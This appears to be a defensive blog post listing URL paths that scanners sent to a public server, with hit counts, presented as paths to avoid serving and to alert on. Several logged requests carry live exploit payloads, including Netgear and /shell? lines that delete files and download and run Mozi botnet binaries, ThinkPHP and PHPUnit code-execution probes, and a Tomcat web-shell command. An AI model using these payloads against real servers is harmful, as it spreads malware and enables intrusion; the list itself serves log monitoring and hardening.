URL patterns from potential attackers' scanners
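If your cloud VPS exposes a common port (such as 80 or 8080) to the public internet, it will attract scanners and unknown clients probing it day and night. Here I collect the most common URL patterns sent by those scanners and unknown users over a certain period of time. Each line is a hit count followed by the requested path, most frequent first. Many of the paths target exposed secrets and admin surfaces (for example /.env, /.git/config, /.aws/credentials and phpMyAdmin directories), so the list doubles as a checklist of what a public web server should never serve, and as a set of paths worth alerting on in access logs.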
850 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
375 /.git/config
374 /boaform/admin/formLogin
352 /?XDEBUG_SESSION_START=phpstorm
308 /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
257 /Autodiscover/Autodiscover.xml
251 /_ignition/execute-solution
238 /console/
223 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
217 /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
213 /actuator/gateway/routes
189 /owa/auth/logon.aspx
187 /actuator/health
177 /owa/auth/x.js
165 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
165 /solr/admin/info/system?wt=json
155 /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
148 /config/getuser?index=0
129 /HNAP1/
117 /mifs/.;/services/LogService
110 /_profiler/empty/search/results
105 /wp-login.php
98 /.aws/credentials
98 /.well-known/security.txt
97 /_profiler/phpinfo
80 /laravel/.env
78 /login
77 /core/.env
77 /info.php
76 /GponForm/diag_Form?style/
71 /GponForm/diag_Form?images/
65 /app/.env
65 /sdk
64 /HNAP1
63 /hudson
63 /portal/redlion
62 /c/version.js
61 /stalker_portal/c/version.js
60 /flu/403.html
60 /streaming/clients_live.php
60 /stream/live.php
60 /system_api.php
59 /.git/HEAD
59 /manager/html
57 /api/.env
55 /admin/.env
55 /config.js
55 /phpinfo.php
55 /public/.env
55 ///remote/fgt_lang?lang=/../../../..//////////dev/
54 /.env.save
53 /config.json
53 /ReportServer
52 /fuN3
49 /ab2g
49 /phpinfo
46 /.env.bak
46 /local/.env
44 /.DS_Store
44 /sitemap
44 /sitemap.txt
43 /pools
43 /scripts/WPnBr.dll
43 /?Z72446562432Q1
42 /CSS/Miniweb.css
42 /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
41 /__Additional
41 /phpmyadmin/index.php
41 /Portal0000.htm
41 /Portal/Portal.mwsl
40 /index.php
39 /ab2h
39 /h5/
39 /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
38 /docs/cplugError.html/
38 /xmlrpc.php
37 /pools/default/buckets
36 /backend/.env
36 /xmlrpc.php?rsd
34 /blog/wp-includes/wlwmanifest.xml
34 /cms/wp-includes/wlwmanifest.xml
34 /site/wp-includes/wlwmanifest.xml
34 /test/wp-includes/wlwmanifest.xml
34 /web/wp-includes/wlwmanifest.xml
34 /wordpress/wp-includes/wlwmanifest.xml
34 /wp1/wp-includes/wlwmanifest.xml
34 /wp/wp-includes/wlwmanifest.xml
33 /cgi-bin/luci
33 /vendor/.env
32 /version
31 /news/wp-includes/wlwmanifest.xml
31 /sito/wp-includes/wlwmanifest.xml
31 /website/wp-includes/wlwmanifest.xml
31 /wp2/wp-includes/wlwmanifest.xml
31 /wp-includes/wlwmanifest.xml
30 /boaform/admin/formLogin?username=admin&psd=admin
30 /prod/.env
29 /ajax
28 /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
28 /homes/
28 /Public/home/js/check.js
28 /web/.env
27 /app/
26 /api/notice
26 /api/user/ismustmobile
26 /application/.env
26 /boaform/admin/formLogin?username=adminisp&psd=adminisp
26 /frontend_dev.php/$
26 /script
26 /wap/
25 /admin/
25 /admin.shtml
25 /api/link/platform
25 /apps/.env
25 /crm/.env
25 /database/.env
25 /echo.php
25 /login.html
25 /m/
25 /manager/text/list
25 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
25 /src/.env
24 /api/linkPF
24 /c/
24 /map/baidumap.xml
24 /phpmyadmin/
24 /server-status
23 /conf/.env
23 /evox/about
23 /rb/getip.php?Z72446562432Q1
23 /stalker_portal/server/tools/auth_simple.php
22 /jenkins/login
22 /solr/
21 /docker/.env
21 /storage/.env
21 /telescope/requests
21 /vendor/laravel/.env
20 /admin.php
20 /boaform/admin/formLogin?username=user&psd=user
20 /config/.env
20 /.env.prod
20 /.git
20 /login.action
20 /mgmt/tm/util/bash
20 /protected/.env
20 /readme.txt
20 /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
19 /0bef
19 /cdn-cgi/trace
19 /ip.php?Z72446562432Q1
19 /shop/wp-includes/wlwmanifest.xml
19 /system/.env
19 /test.php
19 /wp-content/
18 /app/config/.env
18 /blog/.env
18 /boaform/admin/formLogin?username=ec8&psd=ec8
18 /cgi-bin/.env
18 /config/aws.yml
18 /editBlackAndWhiteList
18 /en/.env
18 /ghksjdghdfksanitycheckqwerjlhfgjksdghlid
18 /index.html
18 /tomcatwar.jsp
18 /tomcatwar.jsp?pwd=j&cmd=id
17 /2019/wp-includes/wlwmanifest.xml
17 /audio/.env
17 /base/.env
17 /debug/default/view?panel=config
17 /dev/.env
17 /library/.env
17 /metrics
17 /new/.env
17 /old/.env
17 /shell.php
17 /showLogin.cc
17 /sites/all/libraries/mailchimp/.env
17 /www/.env
16 /1phpmyadmin/index.php?lang=en
16 /2phpmyadmin/index.php?lang=en
16 /admin/db/index.php?lang=en
16 /admin/index.php?lang=en
16 /administrator/admin/index.php?lang=en
16 /administrator/db/index.php?lang=en
16 /administrator/phpmyadmin/index.php?lang=en
16 /administrator/phpMyAdmin/index.php?lang=en
16 /administrator/pma/index.php?lang=en
16 /administrator/PMA/index.php?lang=en
16 /administrator/web/index.php?lang=en
16 /admin/phpmyadmin/index.php?lang=en
16 /admin/phpMyAdmin/index.php?lang=en
16 /admin/pma/index.php?lang=en
16 /admin/sqladmin/index.php?lang=en
16 /admin/sysadmin/index.php?lang=en
16 /admin/web/index.php?lang=en
16 /cgi-bin/index2.asp
16 /database/index.php?lang=en
16 /dbadmin/index.php?lang=en
16 /db/db-admin/index.php?lang=en
16 /db/dbadmin/index.php?lang=en
16 /db/dbweb/index.php?lang=en
16 /db/index.php?lang=en
16 /db/myadmin/index.php?lang=en
16 /db/phpmyadmin3/index.php?lang=en
16 /db/phpMyAdmin-3/index.php?lang=en
16 /db/phpMyAdmin3/index.php?lang=en
16 /db/phpmyadmin4/index.php?lang=en
16 /db/phpMyAdmin-4/index.php?lang=en
16 /db/phpmyadmin5/index.php?lang=en
16 /db/phpMyAdmin-5/index.php?lang=en
16 /db/phpmyadmin/index.php?lang=en
16 /db/phpMyAdmin/index.php?lang=en
16 /db/webadmin/index.php?lang=en
16 /db/webdb/index.php?lang=en
16 /db/websql/index.php?lang=en
16 /dns-query
16 /myadmin/index.php?lang=en
16 /MyAdmin/index.php?lang=en
16 /mysql-admin/index.php?lang=en
16 /mysql/admin/index.php?lang=en
16 /mysqladmin/index.php?lang=en
16 /mysql/dbadmin/index.php?lang=en
16 /mysql/db/index.php?lang=en
16 /mysql/index.php?lang=en
16 /mysqlmanager/index.php?lang=en
16 /mysql/mysqlmanager/index.php?lang=en
16 /mysql/pma/index.php?lang=en
16 /mysql/pMA/index.php?lang=en
16 /mysql/sqlmanager/index.php?lang=en
16 /mysql/web/index.php?lang=en
16 /phpmyadmin1/index.php?lang=en
16 /phpMyAdmin1/index.php?lang=en
16 /phpmyadmin2011/index.php?lang=en
16 /phpmyadmin2012/index.php?lang=en
16 /phpmyadmin2013/index.php?lang=en
16 /phpmyadmin2014/index.php?lang=en
16 /phpmyadmin2015/index.php?lang=en
16 /phpmyadmin2016/index.php?lang=en
16 /phpmyadmin2017/index.php?lang=en
16 /phpmyadmin2018/index.php?lang=en
16 /phpmyadmin2019/index.php?lang=en
16 /phpmyadmin2020/index.php?lang=en
16 /phpmyadmin2021/index.php?lang=en
16 /phpmyadmin2022/index.php?lang=en
16 /phpmyadmin2/index.php?lang=en
16 /phpMyAdmin2/index.php?lang=en
16 /phpmyadmin3/index.php?lang=en
16 /phpMyAdmin-3/index.php?lang=en
16 /phpMyAdmin3/index.php?lang=en
16 /phpMyAdmin-4.9.7/index.php?lang=en
16 /phpmyadmin4/index.php?lang=en
16 /phpMyAdmin-4/index.php?lang=en
16 /phpMyAdmin4/index.php?lang=en
16 /phpMyAdmin-5.1.0/index.php?lang=en
16 /phpMyAdmin-5.1.1/index.php?lang=en
16 /phpMyAdmin-5.1.2/index.php?lang=en
16 /phpMyAdmin-5.1.3/index.php?lang=en
16 /phpMyAdmin5.1/index.php?lang=en
16 /phpMyAdmin-5.2.0/index.php?lang=en
16 /phpMyAdmin5.2/index.php?lang=en
16 /phpmyadmin5/index.php?lang=en
16 /phpMyAdmin-5/index.php?lang=en
16 /phpMyAdmin5/index.php?lang=en
16 /_phpmyadmin/index.php?lang=en
16 /_phpmyadmin_/index.php?lang=en
16 /php-my-admin/index.php?lang=en
16 /php-myadmin/index.php?lang=en
16 /phpmy-admin/index.php?lang=en
16 /phpmyadmin/index.php?lang=en
16 /phpmyadmin_/index.php?lang=en
16 /phpmyAdmin/index.php?lang=en
16 /phpMyadmin/index.php?lang=en
16 /_phpMyAdmin/index.php?lang=en
16 /phpMyAdmin/index.php?lang=en
16 /phpMyAdmin_/index.php?lang=en
16 /phpmy/index.php?lang=en
16 /phppma/index.php?lang=en
16 /pma/index.php?lang=en
16 /PMA/index.php?lang=en
16 /program/index.php?lang=en
16 /query
16 /resolve
16 /rest/.env
16 /room/getRoomBangFans
16 /shopdb/index.php?lang=en
16 /sqlmanager/index.php?lang=en
16 /sql/myadmin/index.php?lang=en
16 /sql/phpmanager/index.php?lang=en
16 /sql/phpMyAdmin2/index.php?lang=en
16 /sql/phpmyadmin3/index.php?lang=en
16 /sql/phpmyadmin4/index.php?lang=en
16 /sql/phpmyadmin5/index.php?lang=en
16 /sql/php-myadmin/index.php?lang=en
16 /sql/phpmy-admin/index.php?lang=en
16 /sql/phpMyAdmin/index.php?lang=en
16 /sql/sql-admin/index.php?lang=en
16 /sql/sqladmin/index.php?lang=en
16 /sql/sql/index.php?lang=en
16 /sql/sqlweb/index.php?lang=en
16 /sql/webadmin/index.php?lang=en
16 /sql/webdb/index.php?lang=en
16 /sql/websql/index.php?lang=en
16 /webfig/
16 /wp-admin/.env
16 /wp-content/.env
16 /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
15 /aws.yml
15 /ip?Z72446562432Q1
15 /manager/js/left.js
15 /newsite/.env
15 /style.css
15 /Telerik.Web.UI.WebResource.axd?type=rau
15 /web_shell_cmd.gch
14 /api/lottery/color
14 /api/message/webInfo
14 /api/uploads/apimap
14 /Content/m_1/js/m_1_Jquery.js
14 /css/style.css
14 /h5
14 /Home/GetAllGameCategory
14 /index.htm
14 /js/common.js
14 /js/json.js
14 /km.asmx/getPlatParam
14 /login/kefuxian.mvc
14 /Public/css/_pk10.css
14 /public/css/style.css
14 /Recruit/download_url
14 /site/.env
14 /staging/.env
14 /static/guide/ab.css
14 /static/wap/css/trade-history.css
14 /static/wap/js/common.js
14 /us/img/nyyh/chkjs.js
14 /v2/start/config
Reference: https://www.metasploit.com/get-started